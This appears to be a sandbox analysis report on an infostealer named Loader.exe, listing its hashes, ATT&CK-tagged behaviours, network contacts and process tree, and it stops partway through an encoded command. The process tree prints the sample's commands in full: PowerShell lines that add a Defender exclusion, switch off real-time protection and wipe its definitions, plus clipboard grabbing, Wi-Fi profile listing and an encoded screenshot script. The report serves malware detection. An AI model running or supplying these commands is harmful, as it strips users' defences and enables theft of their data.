348dc41dc1e75835c4c49bd5b12849966734b44c54f4f4be00a7cb9ac5455861

Analysis

max time kernel
93s
max time network
148s
platform
windows10-2004_x64
resource
win10v2004-20250314-en
resource tags

arch:x64arch:x86image:win10v2004-20250314-enlocale:en-usos:windows10-2004-x64system
submitted
26/03/2025, 16:55

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Loader/Loader.exe
Size

7.5MB
MD5

251ac55d55b47ec078473eeaa1e510e7
SHA1

1126ce753d5f4916e5e4f0fa5fa002bd7bce181b
SHA256

60bbd89cca19b257dd70d37ce4907d86e96b2711da5d945dd4204a88edad318b
SHA512

90120ff2ac2ad04758279695b43b45759829535d7b8519a2907bc2b1169a1e510a7e383e2347e7f15225de1a924bd9b77637d9c77e7838d99b062c279ae3912f
SSDEEP

196608:pWOgoiwfI9jUCH0+n4/JKIYJmg+Irj+dD1SAxw:28IHU+GJPYf9ydD1s

Score

8^/10

collection credential_access defense_evasion discovery execution persistence privilege_escalation spyware stealer upx

Malware Config

Signatures

Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
1636	powershell.exe
4740	powershell.exe
1072	powershell.exe
2492	powershell.exe

Clipboard Data 1 TTPs 2 IoCs

Adversaries may collect data stored in the clipboard from users copying information within or between applications.

collection

Clipboard Data

T1115

pid	Process
3416	cmd.exe
2240	powershell.exe

Executes dropped EXE 1 IoCs

pid	Process
552	rar.exe

Loads dropped DLL 17 IoCs

pid	Process
2384	Loader.exe
2384	Loader.exe
2384	Loader.exe
2384	Loader.exe
2384	Loader.exe
2384	Loader.exe
2384	Loader.exe
2384	Loader.exe
2384	Loader.exe
2384	Loader.exe
2384	Loader.exe
2384	Loader.exe
2384	Loader.exe
2384	Loader.exe
2384	Loader.exe
2384	Loader.exe
2384	Loader.exe

Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Credentials from Web Browsers
T1555.003
Unsecured Credentials: Credentials In Files 1 TTPs
Steal credentials from unsecured files.
credential_access stealer

Credentials In Files
T1552.001
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials In Files
T1552.001

Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service

T1102

flow	ioc
32	discord.com
33	discord.com

Looks up external IP address via web service 1 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
30	ip-api.com

Obfuscated Files or Information: Command Obfuscation 1 TTPs
Adversaries may obfuscate content during command execution to impede detection.
defense_evasion

Command Obfuscation
T1027.010

Enumerates processes with tasklist 1 TTPs 3 IoCs

discovery

Process Discovery

T1057

pid	Process
2436	tasklist.exe
4268	tasklist.exe
4088	tasklist.exe

UPX packed file 57 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral2/files/0x0007000000024105-21.dat	upx
behavioral2/memory/2384-25-0x00007FFBB5770000-0x00007FFBB5E32000-memory.dmp	upx
behavioral2/files/0x0007000000024103-29.dat	upx
behavioral2/files/0x00070000000240ff-48.dat	upx
behavioral2/files/0x00070000000240f7-49.dat	upx
behavioral2/files/0x00070000000240fe-47.dat	upx
behavioral2/files/0x00070000000240fb-51.dat	upx
behavioral2/memory/2384-52-0x00007FFBC4E00000-0x00007FFBC4E2C000-memory.dmp	upx
behavioral2/memory/2384-50-0x00007FFBCABF0000-0x00007FFBCAC09000-memory.dmp	upx
behavioral2/files/0x00070000000240fd-46.dat	upx
behavioral2/files/0x00070000000240fc-45.dat	upx
behavioral2/files/0x00070000000240fa-43.dat	upx
behavioral2/files/0x00070000000240f9-42.dat	upx
behavioral2/files/0x000700000002410a-40.dat	upx
behavioral2/files/0x0007000000024109-39.dat	upx
behavioral2/files/0x0007000000024108-38.dat	upx
behavioral2/files/0x0007000000024104-35.dat	upx
behavioral2/memory/2384-58-0x00007FFBC4B20000-0x00007FFBC4B44000-memory.dmp	upx
behavioral2/files/0x0007000000024102-34.dat	upx
behavioral2/memory/2384-60-0x00007FFBBE1D0000-0x00007FFBBE34F000-memory.dmp	upx
behavioral2/memory/2384-32-0x00007FFBCC8D0000-0x00007FFBCC8DF000-memory.dmp	upx
behavioral2/memory/2384-30-0x00007FFBC8880000-0x00007FFBC88A5000-memory.dmp	upx
behavioral2/files/0x00070000000240f8-28.dat	upx
behavioral2/memory/2384-66-0x00007FFBC46F0000-0x00007FFBC4723000-memory.dmp	upx
behavioral2/memory/2384-74-0x00007FFBC8880000-0x00007FFBC88A5000-memory.dmp	upx
behavioral2/memory/2384-73-0x00007FFBB4DF0000-0x00007FFBB5323000-memory.dmp	upx
behavioral2/memory/2384-71-0x00007FFBB5330000-0x00007FFBB53FE000-memory.dmp	upx
behavioral2/memory/2384-70-0x00007FFBB5770000-0x00007FFBB5E32000-memory.dmp	upx
behavioral2/memory/2384-80-0x00007FFBB4CD0000-0x00007FFBB4DEA000-memory.dmp	upx
behavioral2/memory/2384-78-0x00007FFBC8770000-0x00007FFBC877D000-memory.dmp	upx
behavioral2/memory/2384-76-0x00007FFBC49D0000-0x00007FFBC49E4000-memory.dmp	upx
behavioral2/memory/2384-102-0x00007FFBC4B20000-0x00007FFBC4B44000-memory.dmp	upx
behavioral2/memory/2384-213-0x00007FFBBE1D0000-0x00007FFBBE34F000-memory.dmp	upx
behavioral2/memory/2384-64-0x00007FFBC9680000-0x00007FFBC968D000-memory.dmp	upx
behavioral2/memory/2384-62-0x00007FFBC49F0000-0x00007FFBC4A09000-memory.dmp	upx
behavioral2/memory/2384-325-0x00007FFBC46F0000-0x00007FFBC4723000-memory.dmp	upx
behavioral2/memory/2384-336-0x00007FFBB5330000-0x00007FFBB53FE000-memory.dmp	upx
behavioral2/memory/2384-338-0x00007FFBB4DF0000-0x00007FFBB5323000-memory.dmp	upx
behavioral2/memory/2384-339-0x00007FFBB5770000-0x00007FFBB5E32000-memory.dmp	upx
behavioral2/memory/2384-353-0x00007FFBB4CD0000-0x00007FFBB4DEA000-memory.dmp	upx
behavioral2/memory/2384-345-0x00007FFBBE1D0000-0x00007FFBBE34F000-memory.dmp	upx
behavioral2/memory/2384-340-0x00007FFBC8880000-0x00007FFBC88A5000-memory.dmp	upx
behavioral2/memory/2384-382-0x00007FFBB4CD0000-0x00007FFBB4DEA000-memory.dmp	upx
behavioral2/memory/2384-381-0x00007FFBC8770000-0x00007FFBC877D000-memory.dmp	upx
behavioral2/memory/2384-379-0x00007FFBB5330000-0x00007FFBB53FE000-memory.dmp	upx
behavioral2/memory/2384-378-0x00007FFBC46F0000-0x00007FFBC4723000-memory.dmp	upx
behavioral2/memory/2384-377-0x00007FFBC9680000-0x00007FFBC968D000-memory.dmp	upx
behavioral2/memory/2384-376-0x00007FFBC49F0000-0x00007FFBC4A09000-memory.dmp	upx
behavioral2/memory/2384-375-0x00007FFBBE1D0000-0x00007FFBBE34F000-memory.dmp	upx
behavioral2/memory/2384-374-0x00007FFBC4B20000-0x00007FFBC4B44000-memory.dmp	upx
behavioral2/memory/2384-373-0x00007FFBC4E00000-0x00007FFBC4E2C000-memory.dmp	upx
behavioral2/memory/2384-372-0x00007FFBCABF0000-0x00007FFBCAC09000-memory.dmp	upx
behavioral2/memory/2384-371-0x00007FFBCC8D0000-0x00007FFBCC8DF000-memory.dmp	upx
behavioral2/memory/2384-380-0x00007FFBC49D0000-0x00007FFBC49E4000-memory.dmp	upx
behavioral2/memory/2384-370-0x00007FFBC8880000-0x00007FFBC88A5000-memory.dmp	upx
behavioral2/memory/2384-369-0x00007FFBB4DF0000-0x00007FFBB5323000-memory.dmp	upx
behavioral2/memory/2384-354-0x00007FFBB5770000-0x00007FFBB5E32000-memory.dmp	upx

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Event Triggered Execution: Netsh Helper DLL 1 TTPs 3 IoCs

Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

persistence privilege_escalation

Netsh Helper DLL

T1546.007

description	ioc	Process
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe

System Network Configuration Discovery: Wi-Fi Discovery 1 TTPs 2 IoCs

Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems.

discovery

Wi-Fi Discovery

T1016.002

pid	Process
384	cmd.exe
640	netsh.exe

Detects videocard installed 1 TTPs 1 IoCs

Uses WMIC.exe to determine videocard installed.

System Information Discovery

T1082

pid	Process
4640	WMIC.exe

Gathers system information 1 TTPs 1 IoCs

Runs systeminfo.exe.

System Information Discovery

T1082

pid	Process
3940	systeminfo.exe

Suspicious behavior: EnumeratesProcesses 20 IoCs

pid	Process
2492	powershell.exe
1636	powershell.exe
1636	powershell.exe
2492	powershell.exe
2240	powershell.exe
2240	powershell.exe
4000	powershell.exe
4000	powershell.exe
4000	powershell.exe
2240	powershell.exe
4740	powershell.exe
4740	powershell.exe
4688	powershell.exe
4688	powershell.exe
1072	powershell.exe
1072	powershell.exe
1072	powershell.exe
3656	powershell.exe
3656	powershell.exe
3656	powershell.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	2492	powershell.exe
Token: SeDebugPrivilege	1636	powershell.exe
Token: SeDebugPrivilege	4268	tasklist.exe
Token: SeDebugPrivilege	2436	tasklist.exe
Token: SeIncreaseQuotaPrivilege	3320	WMIC.exe
Token: SeSecurityPrivilege	3320	WMIC.exe
Token: SeTakeOwnershipPrivilege	3320	WMIC.exe
Token: SeLoadDriverPrivilege	3320	WMIC.exe
Token: SeSystemProfilePrivilege	3320	WMIC.exe
Token: SeSystemtimePrivilege	3320	WMIC.exe
Token: SeProfSingleProcessPrivilege	3320	WMIC.exe
Token: SeIncBasePriorityPrivilege	3320	WMIC.exe
Token: SeCreatePagefilePrivilege	3320	WMIC.exe
Token: SeBackupPrivilege	3320	WMIC.exe
Token: SeRestorePrivilege	3320	WMIC.exe
Token: SeShutdownPrivilege	3320	WMIC.exe
Token: SeDebugPrivilege	3320	WMIC.exe
Token: SeSystemEnvironmentPrivilege	3320	WMIC.exe
Token: SeRemoteShutdownPrivilege	3320	WMIC.exe
Token: SeUndockPrivilege	3320	WMIC.exe
Token: SeManageVolumePrivilege	3320	WMIC.exe
Token: 33	3320	WMIC.exe
Token: 34	3320	WMIC.exe
Token: 35	3320	WMIC.exe
Token: 36	3320	WMIC.exe
Token: SeDebugPrivilege	2240	powershell.exe
Token: SeDebugPrivilege	4088	tasklist.exe
Token: SeDebugPrivilege	4000	powershell.exe
Token: SeIncreaseQuotaPrivilege	3320	WMIC.exe
Token: SeSecurityPrivilege	3320	WMIC.exe
Token: SeTakeOwnershipPrivilege	3320	WMIC.exe
Token: SeLoadDriverPrivilege	3320	WMIC.exe
Token: SeSystemProfilePrivilege	3320	WMIC.exe
Token: SeSystemtimePrivilege	3320	WMIC.exe
Token: SeProfSingleProcessPrivilege	3320	WMIC.exe
Token: SeIncBasePriorityPrivilege	3320	WMIC.exe
Token: SeCreatePagefilePrivilege	3320	WMIC.exe
Token: SeBackupPrivilege	3320	WMIC.exe
Token: SeRestorePrivilege	3320	WMIC.exe
Token: SeShutdownPrivilege	3320	WMIC.exe
Token: SeDebugPrivilege	3320	WMIC.exe
Token: SeSystemEnvironmentPrivilege	3320	WMIC.exe
Token: SeRemoteShutdownPrivilege	3320	WMIC.exe
Token: SeUndockPrivilege	3320	WMIC.exe
Token: SeManageVolumePrivilege	3320	WMIC.exe
Token: 33	3320	WMIC.exe
Token: 34	3320	WMIC.exe
Token: 35	3320	WMIC.exe
Token: 36	3320	WMIC.exe
Token: SeDebugPrivilege	4740	powershell.exe
Token: SeDebugPrivilege	4688	powershell.exe
Token: SeIncreaseQuotaPrivilege	3880	WMIC.exe
Token: SeSecurityPrivilege	3880	WMIC.exe
Token: SeTakeOwnershipPrivilege	3880	WMIC.exe
Token: SeLoadDriverPrivilege	3880	WMIC.exe
Token: SeSystemProfilePrivilege	3880	WMIC.exe
Token: SeSystemtimePrivilege	3880	WMIC.exe
Token: SeProfSingleProcessPrivilege	3880	WMIC.exe
Token: SeIncBasePriorityPrivilege	3880	WMIC.exe
Token: SeCreatePagefilePrivilege	3880	WMIC.exe
Token: SeBackupPrivilege	3880	WMIC.exe
Token: SeRestorePrivilege	3880	WMIC.exe
Token: SeShutdownPrivilege	3880	WMIC.exe
Token: SeDebugPrivilege	3880	WMIC.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 1996 wrote to memory of 2384	1996	Loader.exe	87
PID 1996 wrote to memory of 2384	1996	Loader.exe	87
PID 2384 wrote to memory of 3360	2384	Loader.exe	88
PID 2384 wrote to memory of 3360	2384	Loader.exe	88
PID 2384 wrote to memory of 1668	2384	Loader.exe	128
PID 2384 wrote to memory of 1668	2384	Loader.exe	128
PID 1668 wrote to memory of 1636	1668	cmd.exe	92
PID 1668 wrote to memory of 1636	1668	cmd.exe	92
PID 3360 wrote to memory of 2492	3360	cmd.exe	93
PID 3360 wrote to memory of 2492	3360	cmd.exe	93
PID 2384 wrote to memory of 940	2384	Loader.exe	94
PID 2384 wrote to memory of 940	2384	Loader.exe	94
PID 2384 wrote to memory of 4704	2384	Loader.exe	96
PID 2384 wrote to memory of 4704	2384	Loader.exe	96
PID 4704 wrote to memory of 2436	4704	cmd.exe	178
PID 4704 wrote to memory of 2436	4704	cmd.exe	178
PID 940 wrote to memory of 4268	940	cmd.exe	99
PID 940 wrote to memory of 4268	940	cmd.exe	99
PID 2384 wrote to memory of 216	2384	Loader.exe	102
PID 2384 wrote to memory of 216	2384	Loader.exe	102
PID 2384 wrote to memory of 3416	2384	Loader.exe	103
PID 2384 wrote to memory of 3416	2384	Loader.exe	103
PID 2384 wrote to memory of 3868	2384	Loader.exe	104
PID 2384 wrote to memory of 3868	2384	Loader.exe	104
PID 2384 wrote to memory of 3088	2384	Loader.exe	107
PID 2384 wrote to memory of 3088	2384	Loader.exe	107
PID 2384 wrote to memory of 384	2384	Loader.exe	109
PID 2384 wrote to memory of 384	2384	Loader.exe	109
PID 2384 wrote to memory of 4876	2384	Loader.exe	112
PID 2384 wrote to memory of 4876	2384	Loader.exe	112
PID 2384 wrote to memory of 3880	2384	Loader.exe	160
PID 2384 wrote to memory of 3880	2384	Loader.exe	160
PID 3416 wrote to memory of 2240	3416	cmd.exe	116
PID 3416 wrote to memory of 2240	3416	cmd.exe	116
PID 3088 wrote to memory of 2968	3088	cmd.exe	117
PID 3088 wrote to memory of 2968	3088	cmd.exe	117
PID 216 wrote to memory of 3320	216	cmd.exe	118
PID 216 wrote to memory of 3320	216	cmd.exe	118
PID 3880 wrote to memory of 4000	3880	cmd.exe	119
PID 3880 wrote to memory of 4000	3880	cmd.exe	119
PID 3868 wrote to memory of 4088	3868	cmd.exe	120
PID 3868 wrote to memory of 4088	3868	cmd.exe	120
PID 384 wrote to memory of 640	384	cmd.exe	121
PID 384 wrote to memory of 640	384	cmd.exe	121
PID 4876 wrote to memory of 3940	4876	cmd.exe	122
PID 4876 wrote to memory of 3940	4876	cmd.exe	122
PID 2384 wrote to memory of 1468	2384	Loader.exe	123
PID 2384 wrote to memory of 1468	2384	Loader.exe	123
PID 1468 wrote to memory of 3920	1468	cmd.exe	125
PID 1468 wrote to memory of 3920	1468	cmd.exe	125
PID 2384 wrote to memory of 1932	2384	Loader.exe	126
PID 2384 wrote to memory of 1932	2384	Loader.exe	126
PID 1932 wrote to memory of 1668	1932	cmd.exe	128
PID 1932 wrote to memory of 1668	1932	cmd.exe	128
PID 2384 wrote to memory of 4748	2384	Loader.exe	129
PID 2384 wrote to memory of 4748	2384	Loader.exe	129
PID 4000 wrote to memory of 4888	4000	powershell.exe	131
PID 4000 wrote to memory of 4888	4000	powershell.exe	131
PID 4748 wrote to memory of 4940	4748	cmd.exe	132
PID 4748 wrote to memory of 4940	4748	cmd.exe	132
PID 2384 wrote to memory of 2856	2384	Loader.exe	133
PID 2384 wrote to memory of 2856	2384	Loader.exe	133
PID 2856 wrote to memory of 5020	2856	cmd.exe	135
PID 2856 wrote to memory of 5020	2856	cmd.exe	135

C:\Users\Admin\AppData\Local\Temp\Loader\Loader.exe
"C:\Users\Admin\AppData\Local\Temp\Loader\Loader.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:1996
- C:\Users\Admin\AppData\Local\Temp\Loader\Loader.exe
  "C:\Users\Admin\AppData\Local\Temp\Loader\Loader.exe"
  2⤵
  - Loads dropped DLL
  - Suspicious use of WriteProcessMemory
  PID:2384
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Loader\Loader.exe'"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3360
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Loader\Loader.exe'
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:2492
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1668
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:1636
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:940
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      Suspicious use of AdjustPrivilegeToken
      PID:4268
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4704
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      Suspicious use of AdjustPrivilegeToken
      PID:2436
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:216
  - - C:\Windows\System32\Wbem\WMIC.exe
      WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:3320
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
    3⤵
    - Clipboard Data
    - Suspicious use of WriteProcessMemory
    PID:3416
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-Clipboard
      4⤵
      Clipboard Data
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:2240
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3868
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      Suspicious use of AdjustPrivilegeToken
      PID:4088
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3088
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:2968
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
    3⤵
    - System Network Configuration Discovery: Wi-Fi Discovery
    - Suspicious use of WriteProcessMemory
    PID:384
  - - C:\Windows\system32\netsh.exe
      netsh wlan show profile
      4⤵
      Event Triggered Execution: Netsh Helper DLL
      System Network Configuration Discovery: Wi-Fi Discovery
      PID:640
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "systeminfo"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4876
  - - C:\Windows\system32\systeminfo.exe
      systeminfo
      4⤵
      Gathers system information
      PID:3940
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3880
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlA